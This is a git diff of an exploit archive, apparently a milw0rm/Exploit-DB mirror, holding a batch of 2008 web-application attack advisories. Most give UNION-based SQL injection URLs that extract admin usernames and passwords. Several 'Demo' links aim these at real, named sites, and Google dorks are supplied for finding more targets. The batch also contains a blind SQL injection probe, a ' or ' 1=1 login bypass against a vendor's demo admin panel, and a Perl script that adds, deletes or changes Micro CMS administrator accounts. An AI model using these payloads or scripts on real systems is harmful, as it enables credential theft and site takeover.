@@ -1,32 +1,32 @@ - # Bl@ckbe@rD ('Tunisian TerrorisT') # - # ===================== # ------------------------------------------------------------------------------------ - -[+] Script Name : Asp Forum v1.0 Rem0te SQL Injection EXploit - -[+] Author : Bl@ckbe@rD ('Tunisian TerrorisT') - -[+] Contact : blackbeard-sql[A.T]hotmail{.}fr - -[+] Home : http://www.underz0ne.org - -[+] Dork : http://www.google.com - -http://www.google.com/search?q=%22ASP+Forum+v1.0+-+Powered+by+GO4I.NET++-%22+++inurl:forums.asp%3FiFor%3D& - -hl=fr&lr=&client=firefox-a&rls=org.mozilla:fr:official&hs=ELg& - -filter=0 - ---//--> - -[+] Expl0iT : - -http://www.site.xx/forum/forum.asp?iFor={sql} - -http://www.site.xx/forum/forum.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users ---//--> - -[+] GrEEtZ : allah , Xerror , hak3r-b0y ,King Of Hacker , UnderZ0ne Crew... - -# milw0rm.com [2008-11-01] + # Bl@ckbe@rD ('Tunisian TerrorisT') # + # ===================== # +----------------------------------------------------------------------------------- + +[+] Script Name : Asp Forum v1.0 Rem0te SQL Injection EXploit + +[+] Author : Bl@ckbe@rD ('Tunisian TerrorisT') + +[+] Contact : blackbeard-sql[A.T]hotmail{.}fr + +[+] Home : http://www.underz0ne.org + +[+] Dork : http://www.google.com + +http://www.google.com/search?q=%22ASP+Forum+v1.0+-+Powered+by+GO4I.NET++-%22+++inurl:forums.asp%3FiFor%3D& + +hl=fr&lr=&client=firefox-a&rls=org.mozilla:fr:official&hs=ELg& + +filter=0 + +--//--> + +[+] Expl0iT : + +http://www.site.xx/forum/forum.asp?iFor={sql} + +http://www.site.xx/forum/forum.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users +--//--> + +[+] GrEEtZ : allah , Xerror , hak3r-b0y ,King Of Hacker , UnderZ0ne Crew... + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6931.txt b/platforms/php/webapps/6931.txt index fac45d878..f079ca0f1 100755 --- a/platforms/php/webapps/6931.txt +++ b/platforms/php/webapps/6931.txt 
@@ -1,31 +1,31 @@ -||| Programs Rating (details.php id ) Remote SQL Injection Vulnerability - -|| Author: Hussin X - -|| Home : WwW.IQ-TY.CoM - -|| email: darkangel_g85[at]Yahoo[DoT]com - - -||| script :http://www.yourfreeworld.com/script/rating.php - -||| DorK : *_^ - - - Exploit -________ - -www.[target].com/Script/details.php?id=-1+union+select+1,version(),3,user(),0x48757373696E5F585F5F5761735F68657265,6,7,8,9,10-- - - - Demo -_________ - -http://www.downlinegoldmine.com/rating/details.php?id=-1+union+select+1,version(),3,user(),0x48757373696E5F585F5F5761735F68657265,6,7,8,9,10-- - - - - -| Greetz : All my freind - -# milw0rm.com [2008-11-01] +||| Programs Rating (details.php id ) Remote SQL Injection Vulnerability + +|| Author: Hussin X + +|| Home : WwW.IQ-TY.CoM + +|| email: darkangel_g85[at]Yahoo[DoT]com + + +||| script :http://www.yourfreeworld.com/script/rating.php + +||| DorK : *_^ + + + Exploit +________ + +www.[target].com/Script/details.php?id=-1+union+select+1,version(),3,user(),0x48757373696E5F585F5F5761735F68657265,6,7,8,9,10-- + + + Demo +_________ + +http://www.downlinegoldmine.com/rating/details.php?id=-1+union+select+1,version(),3,user(),0x48757373696E5F585F5F5761735F68657265,6,7,8,9,10-- + + + + +| Greetz : All my freind + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6932.txt b/platforms/php/webapps/6932.txt index f986c663d..7137e2c9e 100755 --- a/platforms/php/webapps/6932.txt +++ b/platforms/php/webapps/6932.txt 
@@ -1,24 +1,24 @@ -########################################################################### - ______ __ __ ______ __ ______ - / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ - / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ - / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / - /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ - /____/ - -# Discovered by : Hakxer -# Type Gap : Auth Bypass -# Script : AJ ARTICLE -# Greetz : Allah , Egyptian x hacker , Br1ght D@rk -########################################################################## - -# [~] First Go to http://www.ajsquare.com/products/demo/admin/index.php -# [~] In username Write : admin ' or ' 1=1 -# [~] In Password Any thing : Hakxer -# [~] Click Login ..! you in panel - - -# Proud To be a Muslim # -#_=END=_# - -# milw0rm.com [2008-11-01] +########################################################################### + ______ __ __ ______ __ ______ + / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ + / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ + / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / + /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ + /____/ + +# Discovered by : Hakxer +# Type Gap : Auth Bypass +# Script : AJ ARTICLE +# Greetz : Allah , Egyptian x hacker , Br1ght D@rk +########################################################################## + +# [~] First Go to http://www.ajsquare.com/products/demo/admin/index.php +# [~] In username Write : admin ' or ' 1=1 +# [~] In Password Any thing : Hakxer +# [~] Click Login ..! you in panel + + +# Proud To be a Muslim # +#_=END=_# + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6933.pl b/platforms/php/webapps/6933.pl index 273aa80a0..b4088ff06 100755 --- a/platforms/php/webapps/6933.pl +++ b/platforms/php/webapps/6933.pl 
@@ -1,130 +1,130 @@ -#!/usr/bin/perl -# -------------------------------------------------------------- -# Micro CMS <= 0.3.5 Remote (Add/Delete/Password Change) Exploit -# StAkeR[at]hotmail[dot]it -# http://www.impliedbydesign.com/apps/microcms/microcms.zip -# -------------------------------------------------------------- - -use strict; -use LWP::UserAgent; - -my ($admin,$passwd); -my @real = undef; -my $http = new LWP::UserAgent; -my ($host,$path,$tell) = @ARGV; - -if($host !~ /http:\/\/(.+?)$/i || $tell !~ /^\-(delete|change|add)?$/i) -{ - print STDOUT "[+] Micro CMS <= 0.3.5 Remote (Add/Delete/Password Change) Exploit\n"; - print STDOUT "[+] Usage: perl $0 http://[host] [path] -option (-delete,-change,-add)\n"; - exit; -} - - -if($tell =~ /delete/i) -{ - print STDOUT "[+]Admin ID: "; - chomp($admin = ); - - if(defined $admin) - { - print STDOUT del_admin($admin); - exit; - } - else - { - print STDOUT "[+] Not Defined!\n"; - exit; - } -} - -if($tell =~ /change/i) -{ - print STDOUT "[+] Admin ID : "; - chomp($admin = ); - - print STDOUT "[+] New Password: "; - chomp($passwd = ); - - if(defined $admin || defined($passwd)) - { - print STDOUT change_pwd($admin,$passwd); - } - else - { - print STDOUT "[+] Not Defined!\n"; - } -} - -if($tell =~ /add/i) -{ - print STDOUT "[+] Admin Username: "; - chomp($admin = ); - - print STDOUT "[+] Admin Password: "; - chomp($passwd = ); - - if(defined $admin || defined($passwd)) - { - print STDOUT add_admin($admin,$passwd); - } - else - { - print STDOUT "[+] Not Defined!\n"; - } -} - - -sub change_pwd -{ - my ($userid,$passwd) = @_; - - my $post = { - action => 'change_password', - administrators_id => $userid, - administrators_password => $passwd, - }; - - $http->post($host.'/'.$path.'/microcms-admin-home.php',$post); - - return "[+] Password Changed! 
($passwd)\n"; - -} - - -sub del_admin -{ - my $userid = shift @_; - - my $post = { - action => 'delete_admin', - administrators_id => $userid, - }; - - $http->post($host.'/'.$path.'/microcms-admin-home.php',$post); - - return "[+] Admin ($userid) Has Been Deleted!\n"; - -} - - -sub add_admin -{ - my ($username,$password) = @_; - my $level = 1; - - my $post = { - action => 'add_admin', - administrators_name => $username, - administrators_username => $username, - administrators_password => $password, - administrators_email => $username, - administrators_level => $level, - }; - - $http->post($host.'/'.$path.'/microcms-admin-home.php',$post); - - return "[+] Username: $username and Password: $password\n"; -} - -# milw0rm.com [2008-11-01] +#!/usr/bin/perl +# -------------------------------------------------------------- +# Micro CMS <= 0.3.5 Remote (Add/Delete/Password Change) Exploit +# StAkeR[at]hotmail[dot]it +# http://www.impliedbydesign.com/apps/microcms/microcms.zip +# -------------------------------------------------------------- + +use strict; +use LWP::UserAgent; + +my ($admin,$passwd); +my @real = undef; +my $http = new LWP::UserAgent; +my ($host,$path,$tell) = @ARGV; + +if($host !~ /http:\/\/(.+?)$/i || $tell !~ /^\-(delete|change|add)?$/i) +{ + print STDOUT "[+] Micro CMS <= 0.3.5 Remote (Add/Delete/Password Change) Exploit\n"; + print STDOUT "[+] Usage: perl $0 http://[host] [path] -option (-delete,-change,-add)\n"; + exit; +} + + +if($tell =~ /delete/i) +{ + print STDOUT "[+]Admin ID: "; + chomp($admin = ); + + if(defined $admin) + { + print STDOUT del_admin($admin); + exit; + } + else + { + print STDOUT "[+] Not Defined!\n"; + exit; + } +} + +if($tell =~ /change/i) +{ + print STDOUT "[+] Admin ID : "; + chomp($admin = ); + + print STDOUT "[+] New Password: "; + chomp($passwd = ); + + if(defined $admin || defined($passwd)) + { + print STDOUT change_pwd($admin,$passwd); + } + else + { + print STDOUT "[+] Not Defined!\n"; + } +} + +if($tell =~ /add/i) +{ + 
print STDOUT "[+] Admin Username: "; + chomp($admin = ); + + print STDOUT "[+] Admin Password: "; + chomp($passwd = ); + + if(defined $admin || defined($passwd)) + { + print STDOUT add_admin($admin,$passwd); + } + else + { + print STDOUT "[+] Not Defined!\n"; + } +} + + +sub change_pwd +{ + my ($userid,$passwd) = @_; + + my $post = { + action => 'change_password', + administrators_id => $userid, + administrators_password => $passwd, + }; + + $http->post($host.'/'.$path.'/microcms-admin-home.php',$post); + + return "[+] Password Changed! ($passwd)\n"; + +} + + +sub del_admin +{ + my $userid = shift @_; + + my $post = { + action => 'delete_admin', + administrators_id => $userid, + }; + + $http->post($host.'/'.$path.'/microcms-admin-home.php',$post); + + return "[+] Admin ($userid) Has Been Deleted!\n"; + +} + + +sub add_admin +{ + my ($username,$password) = @_; + my $level = 1; + + my $post = { + action => 'add_admin', + administrators_name => $username, + administrators_username => $username, + administrators_password => $password, + administrators_email => $username, + administrators_level => $level, + }; + + $http->post($host.'/'.$path.'/microcms-admin-home.php',$post); + + return "[+] Username: $username and Password: $password\n"; +} + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6934.txt b/platforms/php/webapps/6934.txt index 44a27fd14..71f7f9731 100755 --- a/platforms/php/webapps/6934.txt +++ b/platforms/php/webapps/6934.txt 
@@ -1,35 +1,35 @@ -======================================================== - -==> Shahrood (ndetail.php id) Blind SQL Injection Vulnerability - -======================================================== - -==> AuThOr : BazOka-HaCkEr - -==> EmaiL : x9j@hotmail.com - -==> HomE : www.TrYaG.cc/cc - -======================================================== - -==> Product Page : - -==> http://www.shahrood.net/ - -==> ExplO!te : - -==> www.TarGeT.com/ndetail.php?id=[SQL] - -==> Example : - -==> www.shahvar.ir/ndetail.php?id=24+AND+SUBSTRING(@@version,1,1)=5 - -========================================================= - -==> GreeTz : - -==> FeezO , Abu-Mahdi , MoGaTiL , Mr.Al7rbi , Str0ke , TrYaG TeaM - -========================================================= - -# milw0rm.com [2008-11-01] +======================================================== + +==> Shahrood (ndetail.php id) Blind SQL Injection Vulnerability + +======================================================== + +==> AuThOr : BazOka-HaCkEr + +==> EmaiL : x9j@hotmail.com + +==> HomE : www.TrYaG.cc/cc + +======================================================== + +==> Product Page : + +==> http://www.shahrood.net/ + +==> ExplO!te : + +==> www.TarGeT.com/ndetail.php?id=[SQL] + +==> Example : + +==> www.shahvar.ir/ndetail.php?id=24+AND+SUBSTRING(@@version,1,1)=5 + +========================================================= + +==> GreeTz : + +==> FeezO , Abu-Mahdi , MoGaTiL , Mr.Al7rbi , Str0ke , TrYaG TeaM + +========================================================= + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6935.txt b/platforms/php/webapps/6935.txt index 5c1bb3a6a..89ccdf50e 100755 --- a/platforms/php/webapps/6935.txt +++ b/platforms/php/webapps/6935.txt 
@@ -1,32 +1,31 @@ - -Downline Builder( id ) Remote SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -___________________________________ - -script : http://www.yourfreeworld.com/script/downlinebuilder.php - -DorK : inurl:tr.php?id= Downline - -Exploit : -_______ - -tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- - - -Demo : -_______ - -http://www.downlinegoldmine.com/downlinebuilder/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- - - - - - -Greetz : All my freind - -# milw0rm.com [2008-11-01] +Downline Builder( id ) Remote SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +___________________________________ + +script : http://www.yourfreeworld.com/script/downlinebuilder.php + +DorK : inurl:tr.php?id= Downline + +Exploit : +_______ + +tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- + + +Demo : +_______ + +http://www.downlinegoldmine.com/downlinebuilder/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- + + + + + +Greetz : All my freind + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6936.txt b/platforms/php/webapps/6936.txt index bb0d1324a..ac42b04db 100755 --- a/platforms/php/webapps/6936.txt +++ b/platforms/php/webapps/6936.txt 
@@ -1,31 +1,30 @@ - - Banner Management (id) Remote SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -___________________________________ - -script : http://www.yourfreeworld.com/script/bannermanagementscript.asp - -DorK : :) - -Exploit : -_______ - -tr.php?id=-1+union+select+1,2,3,concat(user(),version(),database()),5,6,7,8,9,10,11,12,13-- - - -Demo : -_______ - -http://www.downlinegoldmine.com/bannermanagerpro/tr.php?id=-1+union+select+1,2,3,concat(user(),version(),database()),5,6,7,8,9,10,11,12,13-- - - - - -Greetz : All my freind - -# milw0rm.com [2008-11-01] + Banner Management (id) Remote SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +___________________________________ + +script : http://www.yourfreeworld.com/script/bannermanagementscript.asp + +DorK : :) + +Exploit : +_______ + +tr.php?id=-1+union+select+1,2,3,concat(user(),version(),database()),5,6,7,8,9,10,11,12,13-- + + +Demo : +_______ + +http://www.downlinegoldmine.com/bannermanagerpro/tr.php?id=-1+union+select+1,2,3,concat(user(),version(),database()),5,6,7,8,9,10,11,12,13-- + + + + +Greetz : All my freind + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6937.txt b/platforms/php/webapps/6937.txt index 6d159236f..6f3d6dd2e 100755 --- a/platforms/php/webapps/6937.txt +++ b/platforms/php/webapps/6937.txt 
@@ -1,36 +1,35 @@ - -Blog Blaster( id ) Remote SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -___________________________________ - -script : http://www.yourfreeworld.com/script/blogblaster.php - -DorK : :) - -Exploit : -_______ - -tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- - - -Demo : -_______ - -http://www.downlinegoldmine.com/blogblaster/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- - - -Admin Login : -_______ -/admin/ - - - - -Greetz : All my freind - -# milw0rm.com [2008-11-01] +Blog Blaster( id ) Remote SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +___________________________________ + +script : http://www.yourfreeworld.com/script/blogblaster.php + +DorK : :) + +Exploit : +_______ + +tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- + + +Demo : +_______ + +http://www.downlinegoldmine.com/blogblaster/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- + + +Admin Login : +_______ +/admin/ + + + + +Greetz : All my freind + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6938.txt b/platforms/php/webapps/6938.txt index ec57c6aaf..2d3836a3b 100755 --- a/platforms/php/webapps/6938.txt +++ b/platforms/php/webapps/6938.txt 
@@ -1,31 +1,30 @@ - -Autoresponder Hosting ( id ) Remote SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -___________________________________ - -script :http://www.yourfreeworld.com/script/autoresponderhosting.php - -DorK : inurl:tr.php?id= Autoresponder - -Exploit : -_______ - -tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- - - -Demo : -_______ - -http://www.downlinegoldmine.com/autoresponderhosting/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- - - - - -Greetz : All my freind - -# milw0rm.com [2008-11-01] +Autoresponder Hosting ( id ) Remote SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +___________________________________ + +script :http://www.yourfreeworld.com/script/autoresponderhosting.php + +DorK : inurl:tr.php?id= Autoresponder + +Exploit : +_______ + +tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- + + +Demo : +_______ + +http://www.downlinegoldmine.com/autoresponderhosting/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- + + + + +Greetz : All my freind + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6939.txt b/platforms/php/webapps/6939.txt index 76c7b6ead..189321344 100755 --- a/platforms/php/webapps/6939.txt +++ b/platforms/php/webapps/6939.txt 
@@ -1,33 +1,32 @@ - -Forced Matrix Script ( id ) Remote SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -___________________________________ - -script : http://www.yourfreeworld.com/script/subscriptionforcedmatrix.php - -DorK : inurl:"tr1.php?id=" Forced Matrix - -Exploit : -_______ - -tr1.php?id=-19+union+select+1,2,3,password,5,6,7,8,9,10+from+adminsettings-- - - - - -Demo : -_______ - -http://www.autowebhits.com/subscriptionforcedmatrixt/tr1.php?id=-19+union+select+1,2,3,password,5,6,7,8,9,10+from+adminsettings-- - - - - -Greetz : All my freind - -# milw0rm.com [2008-11-01] +Forced Matrix Script ( id ) Remote SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +___________________________________ + +script : http://www.yourfreeworld.com/script/subscriptionforcedmatrix.php + +DorK : inurl:"tr1.php?id=" Forced Matrix + +Exploit : +_______ + +tr1.php?id=-19+union+select+1,2,3,password,5,6,7,8,9,10+from+adminsettings-- + + + + +Demo : +_______ + +http://www.autowebhits.com/subscriptionforcedmatrixt/tr1.php?id=-19+union+select+1,2,3,password,5,6,7,8,9,10+from+adminsettings-- + + + + +Greetz : All my freind + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6940.txt b/platforms/php/webapps/6940.txt index 9c81ccb51..c9848cc37 100755 --- a/platforms/php/webapps/6940.txt +++ b/platforms/php/webapps/6940.txt 
@@ -1,32 +1,31 @@ - -Short Url & Url Tracker ( id ) Remote SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -___________________________________ - -script : http://www.yourfreeworld.com/script/shorturl.php - -DorK : inurl:"tr.php?id=" Short Url & Url Tracker - -Exploit : -_______ - -tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- - - -Demo : -_______ - - -http://www.safelistadtrading.com/shorturl/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- - - - - -Greetz : All my freind - -# milw0rm.com [2008-11-01] +Short Url & Url Tracker ( id ) Remote SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +___________________________________ + +script : http://www.yourfreeworld.com/script/shorturl.php + +DorK : inurl:"tr.php?id=" Short Url & Url Tracker + +Exploit : +_______ + +tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- + + +Demo : +_______ + + +http://www.safelistadtrading.com/shorturl/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- + + + + +Greetz : All my freind + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6941.txt b/platforms/php/webapps/6941.txt index e2b78bd5a..f31ba4782 100755 --- a/platforms/php/webapps/6941.txt +++ b/platforms/php/webapps/6941.txt 
@@ -1,33 +1,32 @@ - -Viral Marketing ( id ) Remote SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -___________________________________ - -script : http://www.yourfreeworld.com/script/viralmarketing.php - -DorK : Copyright © Viral Marketing 2008 - -Exploit : -_______ - -tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- - - -Demo : -_______ - -http://www.downlinegoldmine.com/viralmarketing/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- - - - - - - -Greetz : All my freind - -# milw0rm.com [2008-11-01] +Viral Marketing ( id ) Remote SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +___________________________________ + +script : http://www.yourfreeworld.com/script/viralmarketing.php + +DorK : Copyright © Viral Marketing 2008 + +Exploit : +_______ + +tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- + + +Demo : +_______ + +http://www.downlinegoldmine.com/viralmarketing/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- + + + + + + +Greetz : All my freind + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6942.txt b/platforms/php/webapps/6942.txt index af55379d8..d805afbea 100755 --- a/platforms/php/webapps/6942.txt +++ b/platforms/php/webapps/6942.txt 
@@ -1,33 +1,32 @@ - -Scrolling Text Ads ( id ) Remote SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -___________________________________ - -script : http://www.yourfreeworld.com/script/scrollingads.php - -DorK : inurl:"tr1.php?id=" - -Exploit : -_______ - -tr1.php?id=-19+union+select+1,2,3,4,concat(0x3a,Username,0x3a,Password),6,7,8,9,10,11,12,13,14,15+from+adminsettings-- - - - -Demo : -_______ - - -http://www.downlinegoldmine.com/scrollingtextads/tr1.php?id=-19+union+select+1,2,3,4,concat(0x3a,Username,0x3a,Password),6,7,8,9,10,11,12,13,14,15+from+adminsettings-- - - - - -Greetz : All my freind - -# milw0rm.com [2008-11-01] +Scrolling Text Ads ( id ) Remote SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +___________________________________ + +script : http://www.yourfreeworld.com/script/scrollingads.php + +DorK : inurl:"tr1.php?id=" + +Exploit : +_______ + +tr1.php?id=-19+union+select+1,2,3,4,concat(0x3a,Username,0x3a,Password),6,7,8,9,10,11,12,13,14,15+from+adminsettings-- + + + +Demo : +_______ + + +http://www.downlinegoldmine.com/scrollingtextads/tr1.php?id=-19+union+select+1,2,3,4,concat(0x3a,Username,0x3a,Password),6,7,8,9,10,11,12,13,14,15+from+adminsettings-- + + + + +Greetz : All my freind + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6943.txt b/platforms/php/webapps/6943.txt index 6a7c06b4c..65b2ce1a9 100755 --- a/platforms/php/webapps/6943.txt +++ b/platforms/php/webapps/6943.txt 
@@ -1,34 +1,33 @@ - -Reminder Service ( id ) Remote SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -___________________________________ - -script : http://www.yourfreeworld.com/script/reminder.php - -DorK : inurl:tr.php?id= Reminder Service - -Exploit : -_______ - -tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- - - - -Demo : -_______ - - -http://www.downlinegoldmine.com/reminderservice/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- - - - - - -Greetz : All my freind - -# milw0rm.com [2008-11-01] +Reminder Service ( id ) Remote SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +___________________________________ + +script : http://www.yourfreeworld.com/script/reminder.php + +DorK : inurl:tr.php?id= Reminder Service + +Exploit : +_______ + +tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- + + + +Demo : +_______ + + +http://www.downlinegoldmine.com/reminderservice/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- + + + + + +Greetz : All my freind + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6944.txt b/platforms/php/webapps/6944.txt index 2e007e218..19d8b2cfc 100755 --- a/platforms/php/webapps/6944.txt +++ b/platforms/php/webapps/6944.txt 
@@ -1,32 +1,31 @@ - -Classifieds Blaster ( id ) Remote SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -___________________________________ - -script : http://www.yourfreeworld.com/script/classifiedsblaster.php - -DorK : :) - -Exploit : -_______ - -tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- - - -Demo : -_______ - -http://www.downlinegoldmine.com/classifiedsblaster/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- - - - - - -Greetz : All my freind - -# milw0rm.com [2008-11-01] +Classifieds Blaster ( id ) Remote SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +___________________________________ + +script : http://www.yourfreeworld.com/script/classifiedsblaster.php + +DorK : :) + +Exploit : +_______ + +tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- + + +Demo : +_______ + +http://www.downlinegoldmine.com/classifiedsblaster/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- + + + + + +Greetz : All my freind + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6945.txt b/platforms/php/webapps/6945.txt index 8b44377fc..7900b01bb 100755 --- a/platforms/php/webapps/6945.txt +++ b/platforms/php/webapps/6945.txt 
@@ -1,33 +1,32 @@ - -Classifieds (category) Remote SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -___________________________________ - -script : http://www.yourfreeworld.com/script/classifieds.php - -DorK : inurl:classifieds/view.php?category= - -Exploit : -_______ - -view.php?category=-2+UNION+SELECT+1,concat(0x3a,Username,0x3a,Password),3+from+adminsettings-- - - - -Demo : -_______ -http://www.downlinegoldmine.com/classifieds/view.php?category=-2+UNION+SELECT+1,concat(0x3a,Username,0x3a,Password),3+from+adminsettings-- - - - - - - -Greetz : All my freind - -# milw0rm.com [2008-11-01] +Classifieds (category) Remote SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +___________________________________ + +script : http://www.yourfreeworld.com/script/classifieds.php + +DorK : inurl:classifieds/view.php?category= + +Exploit : +_______ + +view.php?category=-2+UNION+SELECT+1,concat(0x3a,Username,0x3a,Password),3+from+adminsettings-- + + + +Demo : +_______ +http://www.downlinegoldmine.com/classifieds/view.php?category=-2+UNION+SELECT+1,concat(0x3a,Username,0x3a,Password),3+from+adminsettings-- + + + + + + +Greetz : All my freind + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6946.txt b/platforms/php/webapps/6946.txt index 3092110f6..70b95f631 100755 --- a/platforms/php/webapps/6946.txt +++ b/platforms/php/webapps/6946.txt 
